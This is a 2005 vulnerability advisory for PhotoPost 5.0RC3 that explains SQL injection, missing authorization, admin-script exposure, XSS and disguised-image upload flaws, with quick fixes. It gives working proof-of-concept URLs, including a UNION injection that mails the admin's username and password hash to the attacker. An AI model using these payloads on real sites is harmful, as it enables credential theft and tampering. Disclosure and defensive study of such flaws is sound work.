PhotoPost 5.0RC3, All Enthusiast, Inc, multiple vulnerabilities March 05 2005 For your consideration. 1. BACKGROUND PhotoPost is a popular commercial image publishing software. Everyone loves showing off their photos! Add PhotoPost to your site, or let us install it for you, and your visitors will be able to upload their photos to galleries on your site and interact in photo discussions. Join the 3,500+ sites that are already using PhotoPost and add a fun new dimension to your website. .... Yeah, it is just that bad. 2. IMPACT A series of vulnerabilities allows a remote attacker - to get arbitrary data from photopost tables (*) - to spam administrator mailbox - to steal sessions - to manipulate photographs - TO XSS PhotoPost (*) under some configuration, I will describe it in details later - to upload "image" files with arbitrary content 3. SEVERITY HIGH 4. ANALYSIS 4.1 GETTING ARBITRARY DATA FROM PHOTOPOST TABLES PhotoPost (further on - PP) is built on a highly risky principle of filtering input data, based on magic_quotes: =------ magic_quotes_gpc boolean Sets the magic_quotes state for GPC (Get/Post/Cookie) operations. When magic_quotes are on, all ' (single-quote), " (double quote), \ (backslash) and NUL's are escaped with a backslash automatically. =------ Turning magic_quotes on is neglected by a large percentage of PP users. It is a good idea not to rely on user interaction in the essential matter of data filtering and write nested procedures based on on the mysql_escape_string/mysql_real_escape_string functions instead. Adding a few native strings of code would have definitely fixed that "human" factor. Many users do not have any idea what magic_quotes is and what it is for and what their negligence will lead them to, even despite a warning PP gives while installing. If one were to look into architecture PP is assembled upon, it would become clear that PP should even not attempt to install itself on systems with magic_quotes turned off. PROOF of CONCEPT To see whether PP is running in the environment with magic quotes turned off one might use the following URL: http://photopost.hosting.site/photopost/member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0","yourmail@host.zone",%20concat(username,"%20",%20password)%20from%20users no login required * replace yourmail@host.zone for your email. If the magic quotes turned off you'll get admin MD5 hash and user name on your mail. * this URL might not work out if the site has an old mySQL version =--- UNION is used to combine the result from many SELECT statements into one result set. UNION is available from MySQL 4.0.0 on ..... =--- UNION is the only way to effectively exploit PHP based queries, due to the security mysql_query provides. It was clever of PHP developers not to allow multiple queries divided by ';' QUICK FIX .htaccess php_value magic_quotes_gpc 1 4.2 CODING NEGLIGENCE Analysis of the query (I) leads only to another security issue with PP. It has plenty unsafe requests like "SELECT joindate,email,username FROM {$Globals['pp_db_prefix']}users WHERE userid=$uid" Notice the fact database field userid is compared with $uid. $uid is supplied by the user and thereby it's content is arbitrary and still there is no quotes, no is_alpha, intval check, nothing of the kind. Looking at the code in random shows that, from time to time, PP is doing the checking but the rule is not universal. Even if the magic_quotes were turned on it might be possible to devise a query that could pass, one way or another through and get data posted on your mail anyway. But, the example query (I) won't do it. It just constructed to pass through several conditions that stands before 'send' is invoked. QUICK FIX 1).htaccess php_value magic_quotes_gpc 1 It will at least make it more difficult 4.3 SPAMING ADMINISTRATOR MAILBOX WITH ARBITRARY CONTENT PP doesn't always check if the user is authorized. Though, as in this particular case, three is a login attempt, it won't interact with it's status. The other problem is that PP absolutely doesn't care how much events were served, say - mail sending, how often, or how much authorization attempts were done, it is kind of a lack of policy, combined it could lead to spam. PROOF of CONCEPT http://photopost.hosting.site/photopost/misc.php?action=reportpost&report=1&final=1 no login required using this URL one may spam administrator email with arbitrary number of letters and PP won't even try to stop it QUICK FIX adding if ($User['userid'] == "") { diewell( $Globals['pp_lang']['noreg'] ); } after authenticate() is invoked. in the if($action = "reportpost") section should fix the problem with unauthorized users. But it won't fix the problem in general, anyone who is authorized will be able to spam administrator. 4.4 MANIPULATING USER PHOTOGRAPHS The problem is related to adm-photo.php, despite all the rest administrator scripts it doesn't require "adm-inc.php". adm-inc.php has a built-in check that won't allow anybody except administrator to pass further. That fact opens the door to the set of administrator functions built into adm-photo.php for everyone. As an example I decided to construct URL that would rebuild thumbnails for a picture with a given PID (in our case it is 1), namely - it will rotate it clockwise. ROOF of CONCEPT http://photopost.hosting.site/photopost/adm-photo.php?ppaction=manipulate&pid=1&dowhat=rebuildthumb&dowhat=rotateccw no login required I'm not sure it is not one of the "features" but it looks like no one but admin should be allowed to to this job. QUICK FIX I believe adding require "adm-inc.php"; will solve the problem. 4.5 INSERTING ARBITRARY HTML CODE XSS1 And finally, there is CSS in the PP. function check_tags($data, $allowed){ $data = preg_replace("/<(.*?)>/e", "process_tag(stripslashes('\\1'), \$allowed)", $data); $data = str_replace('javascript:','#',$data); return $data; } I won't comment it. This is a very, very bad habit to check javascript: In short, it is possible to form data the way PP will upload a given URL. Then it will "check" javascript using this lame rule. XSS2 PP doesn't check biography field 'editbio' in the user profile, so, it can easily contain any arbitrary HTML code, tags, javascript, when the personal information is viewed it the session might be stolen. QUICK FIX None 4.6 UPLOADING IMAGES WITH ARBITRARY CONTENT PP allows to upload any file disguised as an image. It neither performs check of the file nor it tries to trim it to some internal standard. Basically one uploads JS as an image into PP then spreads a DIRECT link on the uploaded image. IE will execute JS from a broken image transparently. PROOF OF CONCEPT injected.gif PP SHOULD load 'as a picture; and then, in case of success, save as a pictur' all the uploaded images to guarantee that file content is at least image/gif. QUICK FIX None 5. VENDOR STATUS Informed a week ago by mail. With no response. Next time, if I have time to explore sources again, I'll not inform this particular vendor. When this article was posted in the private PP forum it was removed almost immediately. Today I've got a letter (not personal) about a new 5.01 release. When looking in the fixed files I saw that it really fixes some issues with PP, that were described in this article. Especially the e-mail bypass will not work in 5.01 under no condition. I believe you may easily find the vulnerable versions, as well as some of the source codes :-) with google.com -- Best regards